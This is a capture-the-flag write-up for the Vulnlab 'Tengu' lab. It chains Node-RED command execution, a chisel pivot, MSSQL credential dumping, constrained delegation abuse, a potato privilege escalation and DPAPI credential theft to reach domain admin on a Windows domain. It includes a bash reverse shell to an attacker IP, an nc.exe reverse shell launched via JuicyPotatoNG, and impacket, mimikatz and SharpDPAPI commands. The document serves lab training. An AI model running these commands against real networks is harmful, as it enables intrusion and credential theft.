Vulnlab — Tengu
Tengu, a medium rated chained machine from vulnlab consisting of two windows and one linux host, had an instance node-red running on linux host configured with MSSQL, gaining command execution on that, lead to decrypting the password for the service, accessing MSSQL database by pivoting through linux host and dumping password hash for t2_m.winters who was a linux admin, the linux host had constrained delegation on SQL host though MSSQL through which we can impersonate MSSQL admin and gain local admin, we’ll recover domain admin credentials through DPAPI and using kerberos authentication to logon onto DC.
DC.tengu.vl
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tengu.vl
| Issuer: commonName=DC.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-14T15:26:33
| Not valid after: 2025-03-16T15:26:33
| MD5: b350:11ed:41ce:ff32:a34f:0088:ce22:96f5
|_SHA-1: 711b:6409:e399:0771:d3d3:7eba:1938:5914:7c84:7528
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsSQL.tengu.vl
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-15T15:30:31+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SQL.tengu.vl
| Issuer: commonName=SQL.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-09-14T15:26:45
| Not valid after: 2025-03-16T15:26:45
| MD5: 3cd6:9298:18df:b91e:5194:c958:0df4:528b
|_SHA-1: b304:c807:0de4:a171:0c1a:8b16:1f3e:bd29:2e21:99b5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsnodered.tengu.vl
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 41:c7:d4:28:ec:d8:5b:aa:97:ee:c0:be:3c:e3:aa:73 (ED25519)
1880/tcp open vsat-control?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelBoth windows hosts had only RDP service enabled, on linux hosts, there was something hosted on port 1880 which on googling shows it runs Node-RED, which is a flow based development tool for visual programming used in IoT devices
Remote Command Execution Through Node-RE
Node-RED is known for getting remote command execution (RCE), to achieve this, we’ll need to create a flow by timestamp block following exec block
Replacing the curl command with bash reverse shell
bash -i >& /dev/tcp/10.8.0.136/2222 0>&1After having the shell, it can be stabilized with python3 to use it as a normal shell
From nodered directory, we can find some type of hashed password but not really sure who this belongs to and how this can be cracked
Accessing MSSQL
From sql node properties, we can see the connection string with the username nodered_connector
So there’s a script to decrypt the node-red credentials, which needs flows_cred.json and .config.runtime.json
In order to connect to MSSQL, we’ll need to performing pivoting since that service isn’t exposed to us, we’ll use chisel socks proxy
chisel server --reverse -p 3000
chisel client 10.8.0.136:3000 R:socksWith this, we’ll be able to reach port 1433 on sql.tengu.vl
Trying to enable xp_cmdshell resulted in no luck as this user didn't had privileged in mssql
Enumerating the databases, there are two, which are not available by default, Dev and Demo
Dev didn’t had anything interesting while there was one set of credential from Demo
Attempting to crack this with rockyou.txt didn’t work as the password wasn’t present there however crackstation came handy here
Having the credentials, we can verify the credentials
With bloodhound-python, the domain can be enumerated
proxychains bloodhound-python -d tengu.vl -u t2_m.winters -p 'Tengu123' -c all -ns 10.10.183.37Escalating privileges on linux host
From bloodhound, t2_m.winters is a member of linux admin group which means we can have local admin on the linux host
Through ssh we can easily switch to t2_m.winters user
this host has ReadGMSAPassword on GMSA01$ account
Constrained Delegation on SQL Host
The NThash can be retrieved from /etc/krb5.keytab, this file contains service account hash in this case has NODERED's NThash, the hash can be extracted with KeyTabExtract
This hash can be verified by authenticating on DC
GMSA hash can be retrieved by using --gmsa module on LDAP
proxychains nxc ldap 10.10.238.213 -u 'NODERED$' -H 'hash' --gmsaThis account has AllowedToDelegate permission on SQL host which means we can impersonate as a local admin on this host through MSSQL service, performing constrained delegation
With getST.py we can try to impersonate as administrator user for MSSQL service sql host but it didn’t worked for administrator
Instead of admin, we can check what other users we could target, there’s a group name SQL Admins , with two users
Here we can try to impersonate T1.M_Winters and then login through MSSQL using the ticket
proxychains impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -impersonate 'T1_M.WINTERS' -hashes :hash 'tengu.vl/gMSA01$'@sql.tengu.vl -dc-ip 10.10.168.213From here xp_cmdshell was enabled as this service is running in context of of gmsa01$
Checking our privileges, we can get local administrator by abusing SeImpersonatePrivilege with JuicyPotato-NG or any other recent potato exploit
JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:/Windows/Temp/nc.exe 10.8.0.136 3333 -e cmd.exe"Lateral Movement — Extracting Credentials Trough DPAPI
Running mimikatz to dump local admin hash and checking if there are any hashes in lsass
With lsadump::cache , domain cached credentials can be found where there's cached credentials for c.fowler but obviously this is not in NThash format so it cannot be used in pth unless it's gets cracked, which in this case was a rabbit hole
To dump saved credentials from credential Manager/ task scheduler, we can target DPAPI which stores credentials with user specific keys, being a local admin we can utilize sharpdpapi to dump all credentials
SharpDPAPI.exe machinecredentialsUsing kerberos authentication to spawn a shell as T0_c.fowler
T0_c.fowler is a domain admin, authenticating against the DC to see if the password is valid
But the plain text password wasn’t working and it’s probably due to admin users belonging to Protected Users Group which is why we’ll need to use kerberos authentication
So instead, using kinit we can request TGT for the user by specifying the plain text password and we'll get our ticket using by modifying the /etc/krb5.conf configuration file
[libdefaults]
default_realm = TENGU.VL
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
dns_canonicalize_hostname = false
fcc-mit-ticketflags = true[realms]
TENGU.VL = {
kdc = dc.tengu.vl
}
[domain_realm]
.tengu.vl = TENGU.VLHaving the ticket, we can just dump hashes from ntds.dit using secretsdump.py or just spawn a shell using smb, wmi or psexec
